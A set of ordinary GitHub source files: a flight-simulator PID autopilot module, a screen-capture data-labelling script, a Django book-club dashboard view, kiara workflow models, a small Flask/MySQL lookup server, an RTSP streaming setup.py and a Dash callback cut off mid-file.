error-=360.0\n\t\t\t\n\t\t#Deriviative Part\n\t\tself.D = self.Td * (error - self.prev_error) / dt\n\t\t#Integral Part\n\t\tself.I = self.I + (1/ self.Ti) * error * dt\n\t\t\n\t\t#Limit I if over I_limit\n\t\tif self.I > self.I_limit:\n\t\t\tself.I = self.I_limit\n\t\telif self.I < -self.I_limit:\n\t\t\tself.I = -self.I_limit\n\t\t\n\t\t\t\n\t\t#Proportianal Part\n\t\tself.P = error\n\t\t\n\t\tself.u = self.Kp * (self.P+self.I+self.D)\n\t\t#Check for max deflection Limit u\n\t\tif self.u > self.u_max:\n\t\t\tself.u = self.u_max\n\t\telif self.u < 
self.u_min:\n\t\t\tself.u = self.u_min\n\t\t#Calculate previous\n\t\tself.prev_error = error\n\t\t#Multiply by overall multplier converts it to FSX value\n\t\tself.out = self.u * self.multiplier\n\t\t\n\t\tself.debug = self.outdata(measured, reference, time)\n\t\t\n\t\n\t\n\tdef outdata(self, measured,reference, time):\n\t\t#Just output the data of the important variables in the PID controller for debugging.\n\t\t#Measured, reference, output\n\t\ts = \"%7.3f,%f,%f,%f,%f,%f,%f,%f,%f\" %(time,measured, reference, self.Ref,self.out, self.u, self.P, self.I, self.D)\n\t\treturn s\n\nclass PID3_c(AP_c):\n\t\n\tdef __init__(self, multiplier, global_time, output_ref, output_ref_factor = 1.0):\n\t\t#The overall multipler for the output, and a output refernce, so I of PID controller can be preloaded correctly.\n\t\t#to eliminate ump of output.\n\t\tself.multiplier = multiplier\n\t\tself.output_ref = output_ref #only used during turn_on method so control surfaces don't jump. (Preloads I)\n\t\tself.output_ref_factor = output_ref_factor #used in case output_ref need to by multipled by a factor\n\t\tself.Kp = 1.0 #0.5\n\t\tself.Ti = 1.0\n\t\tself.out = 0.0\n\t\tself.Td = 1.0\n\t\tself.u_min = -1.0\n\t\tself.u_max = 1.0\n\t\tself.u = 0.0\n\t\tself.last_time = global_time\n\t\tself.prev_a_error = 0.0\n\t\tself.prev_d_error = 0.0\n\t\tself.prev_error = 0.0\n\t\tself.I = 0.0\n\t\tself.P = 0.0\n\t\tself.D = 0.0\n\t\tself.I_limit = 1.0 / self.Kp\n\t\tself.max_Roc = 100000.0\n\t\tself.min_Roc = 10000.0\n\t\tself.Ref = 0.0\n\t\tself.curve_slope = 10000.0\n\t\tself.max_Roc_limit = 0.0\n\t\tself.a_list=[]\n\t\tself.a_limit = 0.1\n\tdef set_gains(self, Kp, Ti, Td):\n\t\tself.Kp = Kp\n\t\tself.Ti = Ti\n\t\tself.Td = Td\n\t\n\tdef set_u_limit(self, umax, umin = None):\n\t\t#if u min not given, then make it -1 * umax\n\t\tif umin == None:\n\t\t\tumin = umax * -1.0\n\t\tself.u_min = umin\n\t\tself.u_max = umax\n\t\t\n\tdef set_I_limit(self, I_limit):\n\t\tself.I_limit = I_limit / self.Kp\n\t\n\tdef set_Roc_curve(self, max, min, slope):\n\t\tself.max_Roc = max\n\t\tself.min_Roc = min\n\t\tself.curve_slope = slope\n\t\t\n\tdef turn_on(self, current_reference):\n\t\t#This is used to set the u and prev_error correctly, so when AP turn on, control wont jump.\n\t\tself.I = (self.output_ref.value * self.output_ref_factor / self.multiplier) / self.Kp\n\t\tself.Ref = current_reference\n\t\tself.prev_error = 0.0\n\t\n\tdef calc(self,measured, reference, time, check180 = False):\n\t\t#check180 will make sure error is within +/- 180 used for heading hold.\n\t\t#Just calculate it\n\t\tdt = time - self.last_time\n\t\tself.last_time = time\n\t\t\n\t\t\n\t\t\n\t\t\t\t\n\t\t#Main part of PID controller\n\t\tif dt <= 0.0: dt = 0.000001 #prevent divide by 0\n\t\t#Find overall error\n\t\terror = measured - reference\n\t\t\n\t\t#This makes sure error is within +/-180 only used for heading hold.\n\t\tif check180:\n\t\t\tif error<-180.0: error+=360.0\n\t\t\telif error>180.0: error-=360.0\n\t\t\n\t\t#Use linear relationship to determine change in value desired\n\t\ta_reference = error * 0.15 #Desired acceleration toward capture value\n\t\tif a_reference > self.a_limit:\n\t\t\ta_reference = self.a_limit\n\t\telif a_reference < -self.a_limit:\n\t\t\ta_reference = -self.a_limit\n\t\tself.a_list.append(self.prev_error - error)\n\t\tif len(self.a_list) >10:\n\t\t\tself.a_list.pop(0)\n\t\tavg = sum(self.a_list)/ len(self.a_list)\n\t\t\n\t\t\t\t#This is the change in error per second\n\t\t#accel = (self.prev_error - error) / dt\n\t\taccel = (avg) / 
dt\n\t\tself.Ref = accel\n\t\ta_error = accel - a_reference #error in change of error (acceleration of error)\n\t\t#Deriviative Part\n\t\tself.D = self.Td * (a_error - self.prev_a_error) / dt\n\t\t#Integral Part\n\t\tself.I = self.I + (1/ self.Ti) * a_error * dt\n\t\t\n\t\t#Limit I if over I_limit\n\t\tif self.I > self.I_limit:\n\t\t\tself.I = self.I_limit\n\t\telif self.I < -self.I_limit:\n\t\t\tself.I = -self.I_limit\n\t\t\n\t\t\t\n\t\t#Proportianal Part\n\t\tself.P = a_error\n\t\t\n\t\tself.u = self.Kp * (self.P+self.I+self.D)\n\t\t#Check for max deflection Limit u\n\t\tif self.u > self.u_max:\n\t\t\tself.u = self.u_max\n\t\telif self.u < self.u_min:\n\t\t\tself.u = self.u_min\n\t\t#Calculate previous\n\t\tself.prev_a_error = a_error\n\t\t#self.prev_d_error = d_error\n\t\tself.prev_error = error\n\t\t#Multiply by overall multplier converts it to FSX value\n\t\tself.out = self.u * self.multiplier\n\t\t\nclass CAPTURE_EQU_c(AP_c):\n\t#This is used for a capature equation for altitude, and possibly speed hold.\n\tdef __init__(self, multiplier):\n\t\t#The overall multipler for the output, and a output refernce, so I of PID controller can be preloaded correctly.\n\t\t#to eliminate ump of output.\n\t\tself.multiplier = multiplier\n\t\tself.u_min = -1.0\n\t\tself.u_max = 1.0\n\t\tself.u = 0.0\n\t\tself.P = 0.0\n\t\t\n\tdef set_u_limit(self, umax, umin = None):\n\t\t#if u min not given, then make it -1 * umax\n\t\tif umin == None:\n\t\t\tumin = umax * -1.0\n\t\tself.u_min = umin\n\t\tself.u_max = umax\n\tdef set_Kp_limit(self, Kp):\n\t\tself.Kp = Kp\n\t\n\t\n\tdef calc(self,measured, reference):\n\t\t#Just calculate it\n\t\t\n\t\t#Find overall error\n\t\terror = measured - reference \n\t\tself.P = error\t\t\t\n\t\t#Proportianal Part\n\t\tself.u = self.Kp * (self.P)\n\t\t#Check for max deflection Limit u\n\t\tif self.u > self.u_max:\n\t\t\tself.u = self.u_max\n\t\telif self.u < self.u_min:\n\t\t\tself.u = self.u_min\n\t\t#Calculate previous\n\t\t#Multiply by overall multplier converts it to FSX value\n\t\tself.out = self.u * self.multiplier\n\t\t\nclass PID4_c(AP_c):\n\t\n\tdef __init__(self, multiplier, global_time, output_ref, output_ref_factor = 1.0):\n\t\t#The overall multipler for the output, and a output refernce, so I of PID controller can be preloaded correctly.\n\t\t#to eliminate ump of output.\n\t\tself.multiplier = multiplier\n\t\tself.output_ref = output_ref #only used during turn_on method so control surfaces don't jump. 
(Preloads I)\n\t\tself.output_ref_factor = output_ref_factor #used in case output_ref need to by multipled by a factor\n\t\tself.Kp = 1.0 #0.5\n\t\tself.Ti = 1.0\n\t\tself.Td = 1.0\n\t\tself.u_min = -1.0\n\t\tself.u_max = 1.0\n\t\tself.u = 0.0\n\t\tself.last_time = global_time\n\t\tself.prev_error = 0.0\n\t\tself.I = 0.0\n\t\tself.P = 0.0\n\t\tself.D = 0.0\n\t\tself.I_limit = 1.0 / self.Kp\n\t\tself.max_Roc = 100000.0\n\t\tself.min_Roc = 10000.0\n\t\tself.Ref = 0.0\n\t\tself.curve_slope = 10000.0\n\t\tself.max_Roc_limit = 0.0\n\t\t\n\tdef set_gains(self, Kp, Ti, Td):\n\t\tself.Kp = Kp\n\t\tself.Ti = Ti\n\t\tself.Td = Td\n\t\n\tdef set_u_limit(self, umax, umin = None):\n\t\t#if u min not given, then make it -1 * umax\n\t\tif umin == None:\n\t\t\tumin = umax * -1.0\n\t\tself.u_min = umin\n\t\tself.u_max = umax\n\t\t\n\tdef set_I_limit(self, I_limit):\n\t\tself.I_limit = I_limit / self.Kp\n\t\n\tdef set_Roc_curve(self, max, min, slope):\n\t\tself.max_Roc = max\n\t\tself.min_Roc = min\n\t\tself.curve_slope = slope\n\t\t\n\tdef turn_on(self, current_reference):\n\t\t#This is used to set the u and prev_error correctly, so when AP turn on, control wont jump.\n\t\tself.I = (self.output_ref.value * self.output_ref_factor / self.multiplier) / self.Kp\n\t\tself.Ref = current_reference\n\t\tself.prev_error = 0.0\n\t\n\tdef calc(self,measured, reference, time, check180 = False):\n\t\t#check180 will make sure error is within +/- 180 used for heading hold.\n\t\t#Just calculate it\n\t\tdt = time - self.last_time\n\t\tself.last_time = time\n\t\t\n\t\t#Slow down change of reference with curve\n\t\tself.max_Roc_limit += self.curve_slope # * dt * 3\n\t\tif self.max_Roc_limit > self.max_Roc:\n\t\t\tself.max_Roc_limit = self.max_Roc\n\t\tmax = dt * self.max_Roc_limit\n\t\tmin = dt * self.min_Roc \n\t\tcurve = (reference - self.Ref) * self.curve_slope * dt\n\t\t\n\t\t#if curve >0:\n\t#\t\tsign = 1\n\t\t#else: sign = -1\n\t\ta_curve = abs(curve)\n\t\tif a_curve > max:\n\t\t\ta_curve = max\n\t\telse:\n\t\t\t#Curve is limiting max therefore make roc limit equal to curve\n\t\t\tself.max_Roc_limit = a_curve / dt\n\t\t\tif a_curve < min:\n\t\t\t\ta_curve = min\n\t\t\n\t\tif reference > self.Ref:\n\t\t\tself.Ref += a_curve\n\t\t\tif self.Ref > reference:\n\t\t\t\tself.Ref = reference\n\t\telse: #reference < self.Ref\n\t\t\tself.Ref -= a_curve\n\t\t\tif self.Ref < reference:\n\t\t\t\tself.Ref = reference\n\t\t\t\t\n\t\t#Main part of PID controller\n\t\tif dt <= 0.0: dt = 0.000001 #prevent divide by 0\n\t\t#Find overall error\n\t\terror = measured - self.Ref\n\t\t#This makes sure error is within +/-180 only used for heading hold.\n\t\tif check180:\n\t\t\tif error<-180.0: error+=360.0\n\t\t\telif error>180.0: error-=360.0\n\t\t\t\n\t\t#Deriviative Part\n\t\tself.D = self.Td * (error - self.prev_error) / dt\n\t\t#Integral Part\n\t\tself.I = self.I + (1/ self.Ti) * error * dt\n\t\t\n\t\t#Limit I if over I_limit\n\t\tif self.I > self.I_limit:\n\t\t\tself.I = self.I_limit\n\t\telif self.I < -self.I_limit:\n\t\t\tself.I = -self.I_limit\n\t\t\n\t\t\t\n\t\t#Proportianal Part\n\t\tself.P = error\n\t\t\n\t\tself.u = self.Kp * (self.P+self.I+self.D)\n\t\t#Check for max deflection Limit u\n\t\tif self.u > self.u_max:\n\t\t\tself.u = self.u_max\n\t\telif self.u < self.u_min:\n\t\t\tself.u = self.u_min\n\t\t#Calculate previous\n\t\tself.prev_error = error\n\t\t#Multiply by overall multplier converts it to FSX value\n\t\tself.out = self.u * 
self.multiplier\n","repo_name":"j-omega/RJGlass","sub_path":"autopilot.py","file_name":"autopilot.py","file_ext":"py","file_size_in_byte":26245,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"22009406247","text":"import unit\nimport config\nimport numpy as np\nimport cv2\nimport mss\nimport time\nimport os\n\n\ndef images_pre_save_resize(images):\n for i in range(3):\n img = cv2.resize(images[i], (int(config.recorder[\"base_size\"][\"x\"] / 2), int(config.recorder[\"base_size\"][\"y\"] / 2)))\n img = cv2.cvtColor(img, cv2.COLOR_RGBA2GRAY)\n\n if i == 0:\n return_image = img\n else:\n return_image = np.concatenate((return_image, img), axis=1)\n\n return return_image\n\n\ndef array_indexes_to_label_array(indexes):\n return_value = np.zeros(len(config.labels), np.int8)\n\n for index in indexes:\n return_value[index] = 1\n\n return return_value\n\n\nif __name__ == '__main__':\n try:\n xs, ys = np.load(config.save_dataset_content), np.load(config.save_dataset_label)\n xs, ys = xs.tolist(), ys.tolist()\n except:\n xs, ys = [], []\n\n # debug\n time.sleep(5)\n\n with mss.mss() as sct:\n # Part of the screen to capture\n monitor = {\n \"top\": config.recorder[\"start\"][\"y\"],\n \"left\": config.recorder[\"start\"][\"x\"],\n \"width\": config.recorder[\"base_size\"][\"x\"],\n \"height\": config.recorder[\"base_size\"][\"y\"]\n }\n\n while \"Screen capturing\":\n images = []\n\n for i in range(3):\n img = np.array(sct.grab(monitor))\n images.append(img)\n cv2.imshow(\"save % d\" % i, img)\n\n images_to_save = images_pre_save_resize(images)\n cv2.imshow(\"save\", images_to_save)\n\n if cv2.waitKey(25) & 0xFF == ord(\"q\"):\n label = array_indexes_to_label_array([int(i) for i in list(input(\"label %s : \\n\" % str(list(enumerate(config.labels)))))])\n cv2.destroyAllWindows()\n xs.append(images_to_save)\n ys.append(label)\n\n np.save(config.save_dataset_content, xs)\n np.save(config.save_dataset_label, ys)\n break\n","repo_name":"LewisGet/bot_frame","sub_path":"data_clip.py","file_name":"data_clip.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33555074612","text":"\"\"\"Dashboard views of the clubs app.\"\"\"\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render\nfrom book_club.models import CurrentlyViewing,Post,ClubBookAssignment,UserRating,CurrentlyReading\nfrom django.core.exceptions import ObjectDoesNotExist\n\n@login_required\ndef dashboard(request):\n current_club = CurrentlyViewing.get_currently_viewing(request.user)\n if current_club is None:\n return render(request, 'dashboard.html')\n\n posts = Post.objects.filter(club=current_club)\n\n try:\n clubBooks = ClubBookAssignment.objects.filter(clubs=current_club).prefetch_related('ISBN')\n except ObjectDoesNotExist:\n clubBooks = ''\n\n try:\n userRatedBooks = UserRating.objects.filter(userId=request.user.id).values('ISBN', 'bookRating')\n except ObjectDoesNotExist:\n userRatedBooks = []\n\n try:\n current_book = CurrentlyReading.get_currently_reading(current_club)\n except ObjectDoesNotExist:\n current_book = None\n\n return render(request, 'dashboard.html',\n context={'posts': posts, 'club_books': clubBooks,'userRatedBooks': list(userRatedBooks),\n 
'current_book':current_book})\n","repo_name":"Nikitich2033/ai-book-club-manager","sub_path":"book_club/views/dashboard_views.py","file_name":"dashboard_views.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6802868529","text":"# -*- coding: utf-8 -*-\nimport datetime\nimport uuid\nfrom typing import TYPE_CHECKING, Any, Dict, List, Mapping, Type, Union\n\nfrom dag_cbor import IPLDKind\nfrom pydantic import Field, PrivateAttr, validator\nfrom rich import box\nfrom rich.console import RenderableType\nfrom rich.panel import Panel\nfrom rich.syntax import Syntax\nfrom rich.table import Table\n\nfrom kiara.interfaces.python_api.models.info import InfoItemGroup, ItemInfo\nfrom kiara.models import KiaraModel\nfrom kiara.models.documentation import (\n AuthorsMetadataModel,\n ContextMetadataModel,\n DocumentationMetadataModel,\n)\nfrom kiara.models.module.pipeline import PipelineConfig, PipelineStep\nfrom kiara.models.module.pipeline.pipeline import Pipeline, PipelineInfo\nfrom kiara.models.module.pipeline.structure import PipelineStructure\nfrom kiara.models.values.value import ValueMap\nfrom kiara.utils import is_jupyter\nfrom kiara.utils.json import orjson_dumps\n\nif TYPE_CHECKING:\n from kiara.context import Kiara\n from kiara.interfaces.python_api.workflow import Workflow\n\n\nclass WorkflowState(KiaraModel):\n @classmethod\n def create_from_workflow(self, workflow: \"Workflow\"):\n\n steps = list(workflow._steps.values())\n inputs = dict(workflow.current_pipeline_inputs)\n info = PipelineInfo.create_from_pipeline(\n kiara=workflow._kiara, pipeline=workflow.pipeline\n )\n info._kiara = workflow._kiara\n\n ws = WorkflowState(steps=steps, inputs=inputs, pipeline_info=info)\n ws._kiara = workflow._kiara\n ws.pipeline_info._kiara = workflow._kiara\n return ws\n\n steps: List[PipelineStep] = Field(\n description=\"The current steps in the workflow.\", default_factory=list\n )\n inputs: Dict[str, uuid.UUID] = Field(\n description=\"The current (pipeline) input values.\", default_factory=dict\n )\n pipeline_info: PipelineInfo = Field(\n description=\"Details about the pipeline and its state.\"\n )\n\n _pipeline: Union[Pipeline, None] = PrivateAttr(default=None)\n _kiara: \"Kiara\" = PrivateAttr(default=None)\n\n def _retrieve_data_to_hash(self) -> IPLDKind:\n return {\n \"steps\": [s.instance_cid for s in self.steps],\n \"inputs\": {k: str(v) for k, v in self.inputs.items()},\n }\n\n def set_inputs(self, **inputs: uuid.UUID):\n\n for k, v in inputs.items():\n if k in self.pipeline_config.structure.pipeline_inputs_schema.keys():\n self.inputs[k] = v\n\n @property\n def pipeline_config(self) -> PipelineConfig:\n\n return self.pipeline_info.pipeline_config\n\n @property\n def pipeline_structure(self) -> PipelineStructure:\n return self.pipeline_info.pipeline_config.structure\n\n def create_renderable(self, **config: Any) -> RenderableType:\n\n in_panel = config.get(\"in_panel\", None)\n if in_panel is None:\n if is_jupyter():\n in_panel = True\n else:\n in_panel = False\n table = Table(box=box.SIMPLE, show_header=False, padding=(0, 0, 0, 0))\n table.add_column(\"property\", style=\"i\")\n table.add_column(\"value\")\n table.add_row(\"state id\", self.instance_id)\n\n self.pipeline_info._fill_table(table=table, config=config)\n\n if in_panel:\n return Panel(table)\n else:\n return table\n\n\nclass WorkflowMetadata(KiaraModel):\n _kiara_model_id = \"instance.workflow\"\n\n workflow_id: uuid.UUID = 
Field(\n description=\"The globaly unique uuid for this workflow.\"\n )\n documentation: DocumentationMetadataModel = Field(\n description=\"A description for this workflow.\",\n default_factory=DocumentationMetadataModel.create,\n )\n authors: AuthorsMetadataModel = Field(\n description=\"The author(s) of this workflow.\",\n default_factory=AuthorsMetadataModel,\n )\n context: ContextMetadataModel = Field(\n description=\"Workflow context details.\", default_factory=ContextMetadataModel\n )\n current_state: Union[str, None] = Field(\n description=\"A reference to the current state of this workflow.\", default=None\n )\n workflow_history: Dict[datetime.datetime, str] = Field(\n description=\"A history of all the states of this workflow.\",\n default_factory=dict,\n )\n\n input_aliases: Dict[str, str] = Field(\n description=\"A set of aliases that can be used to forward inputs to their (unaliased) pipeline inputs.\",\n default_factory=dict,\n )\n output_aliases: Dict[str, str] = Field(\n description=\"A set of aliases to make output field names more user friendly.\",\n default_factory=dict,\n )\n\n is_persisted: bool = Field(\n description=\"Whether this workflow is persisted in it's current state in a kiara store.\",\n default=False,\n )\n\n _kiara: Union[\"Kiara\", None] = PrivateAttr(default=None)\n # _last_update: datetime.datetime = PrivateAttr(default_factory=datetime.datetime.now)\n\n @validator(\"documentation\", pre=True)\n def validate_doc(cls, value):\n if not isinstance(value, DocumentationMetadataModel):\n return DocumentationMetadataModel.create(value)\n else:\n return value\n\n @property\n def last_state_id(self) -> Union[None, str]:\n\n if not self.workflow_history:\n return None\n last_date = max(self.workflow_history.keys())\n workflow_state_id = self.workflow_history[last_date]\n return workflow_state_id\n\n\nclass WorkflowInfo(ItemInfo):\n\n _kiara_model_id = \"info.workflow\"\n\n @classmethod\n def create_from_workflow(cls, workflow: \"Workflow\"):\n\n wf_info = WorkflowInfo.construct(\n type_name=str(workflow.workflow_id),\n workflow_metadata=workflow.workflow_metadata,\n workflow_state_ids=workflow.all_state_ids,\n pipeline_info=workflow.pipeline_info,\n documentation=workflow.workflow_metadata.documentation,\n authors=workflow.workflow_metadata.authors,\n context=workflow.workflow_metadata.context,\n current_input_values=workflow.current_input_values,\n current_output_values=workflow.current_output_values,\n input_aliases=dict(workflow.input_aliases),\n output_aliases=dict(workflow.output_aliases),\n )\n return wf_info\n\n @classmethod\n def category_name(cls) -> str:\n return \"workflow\"\n\n @classmethod\n def base_instance_class(cls) -> Type[\"Workflow\"]:\n from kiara.interfaces.python_api.workflow import Workflow\n\n return Workflow\n\n @classmethod\n def create_from_instance(cls, kiara: \"Kiara\", instance: \"Workflow\", **kwargs):\n\n return cls.create_from_workflow(workflow=instance)\n\n workflow_metadata: WorkflowMetadata = Field(description=\"The workflow details.\")\n workflow_state_ids: List[str] = Field(description=\"All states for this workflow.\")\n pipeline_info: PipelineInfo = Field(\n description=\"The current state of the workflows' pipeline.\"\n )\n current_input_values: ValueMap = Field(\n description=\"The current workflow inputs (after aliasing).\"\n )\n current_output_values: ValueMap = Field(\n description=\"The current workflow outputs (after aliasing).\"\n )\n input_aliases: Dict[str, str] = Field(\n description=\"The (current) input 
aliases for this workflow.\"\n )\n output_aliases: Dict[str, str] = Field(\n description=\"The (current) output aliases for this workflow.\"\n )\n\n def create_renderable(self, **config: Any) -> RenderableType:\n\n in_panel = config.get(\"in_panel\", None)\n if in_panel is None:\n if is_jupyter():\n in_panel = True\n else:\n in_panel = False\n\n include_doc = config.get(\"include_doc\", True)\n include_authors = config.get(\"include_authors\", True)\n include_id = config.get(\"include_id\", True)\n include_context = config.get(\"include_context\", True)\n include_history = config.get(\"include_history\", True)\n include_current_inputs = config.get(\"include_current_inputs\", True)\n include_current_outputs = config.get(\"include_current_outputs\", True)\n include_aliases = config.get(\"include_aliases\", True)\n include_current_state = config.get(\"include_current_state\", True)\n\n table = Table(box=box.SIMPLE, show_header=False, padding=(0, 0, 0, 0))\n table.add_column(\"property\", style=\"i\")\n table.add_column(\"value\")\n\n if include_doc:\n table.add_row(\n \"documentation\",\n Panel(self.documentation.create_renderable(), box=box.SIMPLE),\n )\n if include_authors:\n table.add_row(\"author(s)\", self.authors.create_renderable(**config))\n if include_id:\n table.add_row(\"workflow id\", str(self.workflow_metadata.workflow_id))\n if include_context:\n table.add_row(\"context\", self.context.create_renderable(**config))\n if include_aliases:\n aliases = orjson_dumps(\n {\"inputs\": self.input_aliases, \"outputs\": self.output_aliases}\n )\n table.add_row(\n \"current aliases\", Syntax(aliases, \"json\", background_color=\"default\")\n )\n if include_current_inputs:\n inputs_renderable = self.current_input_values.create_renderable(**config)\n table.add_row(\"current inputs\", inputs_renderable)\n if include_current_outputs:\n outputs_renderable = self.current_output_values.create_renderable(**config)\n table.add_row(\"current outputs\", outputs_renderable)\n if include_history:\n history_table = Table(show_header=False, box=box.SIMPLE)\n history_table.add_column(\"date\", style=\"i\")\n history_table.add_column(\"id\")\n for d, s_id in self.workflow_metadata.workflow_history.items():\n history_table.add_row(str(d), s_id)\n table.add_row(\"snapshot timeline\", history_table)\n\n if include_current_state:\n current_state_id = (\n \"-- n/a --\"\n if not self.workflow_metadata.current_state\n else self.workflow_metadata.current_state\n )\n table.add_row(\"current state id\", current_state_id)\n table.add_row(\n \"current state details\", self.pipeline_info.create_renderable(**config)\n )\n\n if in_panel:\n return Panel(table)\n else:\n return table\n\n\nclass WorkflowGroupInfo(InfoItemGroup):\n\n _kiara_model_id = \"info.workflows\"\n\n @classmethod\n def base_info_class(cls) -> Type[ItemInfo]:\n return WorkflowInfo\n\n @classmethod\n def create_from_workflows(\n cls,\n *items: \"Workflow\",\n group_title: Union[str, None] = None,\n alias_map: Union[None, Mapping[str, uuid.UUID]] = None\n ) -> \"WorkflowGroupInfo\":\n\n workflow_infos = {\n str(w.workflow_id): WorkflowInfo.create_from_workflow(workflow=w)\n for w in items\n }\n if alias_map is None:\n alias_map = {}\n workflow_group_info = cls.construct(\n group_title=group_title, item_infos=workflow_infos, aliases=alias_map\n )\n return workflow_group_info\n\n item_infos: Mapping[str, WorkflowInfo] = Field(\n description=\"The workflow infos objects for each workflow.\"\n )\n aliases: Mapping[str, uuid.UUID] = Field(\n description=\"The 
available aliases.\", default_factory=dict\n )\n\n def create_renderable(self, **config: Any) -> RenderableType:\n\n table = Table(box=box.SIMPLE, show_header=True)\n table.add_column(\"alias(es)\", style=\"i\")\n table.add_column(\"workflow_id\")\n table.add_column(\"# steps\")\n table.add_column(\"# stages\")\n table.add_column(\"# states\")\n table.add_column(\"description\")\n\n for workflow_id, wf in self.item_infos.items():\n\n aliases = [k for k, v in self.aliases.items() if str(v) == workflow_id]\n steps = len(wf.pipeline_info.pipeline_config.structure.steps)\n stages = len(wf.pipeline_info.pipeline_config.structure.processing_stages)\n states = len(wf.workflow_state_ids)\n\n if not aliases:\n alias_str = \"\"\n else:\n alias_str = \", \".join(aliases)\n table.add_row(\n alias_str,\n workflow_id,\n str(steps),\n str(stages),\n str(states),\n wf.documentation.description,\n )\n\n return table\n","repo_name":"DHARPA-Project/kiara","sub_path":"src/kiara/models/workflow.py","file_name":"workflow.py","file_ext":"py","file_size_in_byte":12699,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"} +{"seq_id":"19556750471","text":"from flask import Flask, jsonify, request\nimport re\nimport datetime\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy.dialects.mysql import LONGTEXT\nfrom sqlalchemy.orm import relationship, backref\nfrom flask_cors import *\nimport pymysql\nimport json\n\ndef _connect():\n '''连接MySQL数据库'''\n try:\n db = pymysql.connect(\n host='localhost',\n port=3306,\n user='gpc',\n passwd='gpc',\n db='c3server_v3',\n charset='utf8'\n )\n return db\n except Exception:\n raise Exception(\"数据库连接失败\")\n\nserver=Flask(__name__)\nCORS(server, supports_credentials=True)\nserver.config['DEBUG'] = False\n\ndef table_exists(table_name): #这个函数用来判断表是否存在\n db = _connect()\n cursor = db.cursor()\n sql = \"show tables;\"\n cursor.execute(sql)\n tables = [cursor.fetchall()]\n table_list = re.findall('(\\'.*?\\')',str(tables))\n table_list = [re.sub(\"'\",'',each) for each in table_list]\n if table_name in table_list:\n db.close()\n return 1 #存在返回1\n else:\n db.close()\n return 0 #不存在返回0\n\n@server.route('/api/requests', methods=['POST'])\ndef requests():\n start = datetime.datetime.now()\n get_data = json.loads(request.get_data(as_text=True))\n tablename=get_data['table_name']\n H=get_data['H']\n print(H)\n\n if table_exists(tablename) == 0:\n print(tablename+' not exists')\n end = datetime.datetime.now()\n print(\"using time:\\t\",end-start)\n return jsonify(result=\"none\")\n else:\n db = _connect()\n cur = db.cursor()\n sqlQuery = \"SELECT * FROM \"+tablename\n try:\n cur.execute(sqlQuery)\n results = cur.fetchall()\n for data in results:\n if int(H) == int(data[0]):\n db.close()\n end = datetime.datetime.now()\n print(\"using time:\\t\",end-start)\n return jsonify(result=\"match\")\n end = datetime.datetime.now()\n print(\"using time:\\t\",end-start)\n return jsonify(result=\"none\") \n except pymysql.Error as e:\n print(\"数据查询失败:\" + str(e))\n \nif __name__ == '__main__':\n server.run()","repo_name":"nsndhx/cryptograghy_lab","sub_path":"lab4/code/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15308785786","text":"#!/usr/bin/env python3\n\nimport setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(name='rtsp_ws_stream',\n version='0.1',\n 
","repo_name":"nsndhx/cryptograghy_lab","sub_path":"lab4/code/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"15308785786","text":"#!/usr/bin/env python3\n\nimport setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n    long_description = fh.read()\n\nsetuptools.setup(name='rtsp_ws_stream',\n                 version='0.1',\n                 description='Python library to provide an RTSP stream from a camera via websocket',\n                 long_description=long_description,\n                 long_description_content_type=\"text/markdown\",\n                 author='Schwimo',\n                 author_email='Schwimo@github.com',\n                 url='www.schwuster.de',\n                 packages=setuptools.find_packages('include'),\n                 package_dir={'': 'include'},\n                 classifiers=[\n                     'Programming Language :: Python :: 3',\n                     'Operating System :: Microsoft :: Windows',\n                     'Operating System :: POSIX :: Linux',\n                 ],\n                 install_requires=[\n                     'numpy',\n                     'autobahn',\n                     'twisted'\n                 ]\n                 )\n","repo_name":"Schwimo/cam_rtsp_detect","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"38512518649","text":"from pathlib import Path\n\nimport dash_bootstrap_components as dbc\nfrom dash import callback\nfrom dash.dependencies import MATCH, Input, Output, State\nfrom dash.exceptions import PreventUpdate\n\nfrom .model import predict\n\n\n@callback(\n    Output(\"run-card\", \"children\"),\n    Input(\"add-button\", \"n_clicks\"),\n    State(\"run-card\", \"children\"),\n)\ndef add_row(n_clicks: int, children: list) -> list:\n    \"\"\"Adds a row to the card with the model results when \"Add Row\" button is clicked.\n\n    Each object in the row is provided with a dictionary id so that they can be used\n    correctly with pattern-matching callbacks.\n\n    Args:\n        n_clicks (int): Increments on a button click. The trigger for this callback.\n        children (list): The children of the card. Contains dbc.Row or dbc.Form.\n\n    Returns:\n        list: The updated children. Equivalent to the input children plus a Form/Row\n    \"\"\"\n    if n_clicks is None:\n        n_clicks = 0\n\n    form = dbc.Form(\n        dbc.Row(\n            [\n                dbc.Col(\n                    dbc.Input(type=\"text\", id=dict(type=\"lk\", index=n_clicks)),\n                ),\n                dbc.Col(\n                    dbc.Input(type=\"text\", id=dict(type=\"bb\", index=n_clicks)),\n                ),\n                dbc.Col(\n                    [\n                        dbc.Select(\n                            id=dict(type=\"model-dropdown\", index=n_clicks),\n                            value=\"amine2aldehyde3\",\n                            options=[\n                                {\"label\": model.stem, \"value\": model.stem}\n                                for model in Path(\"models\").glob(\"*\")\n                            ],\n                        ),\n                    ]\n                ),\n                dbc.Col(\n                    dbc.Button(\n                        \"Run Model \\U0001F680\",\n                        id=dict(type=\"run-button\", index=n_clicks),\n                        color=\"primary\",\n                    ),\n                    class_name=\"d-grid gap-2\",\n                ),\n                dbc.Col(dbc.Spinner(dbc.Label(id=dict(type=\"result\", index=n_clicks)))),\n            ],\n            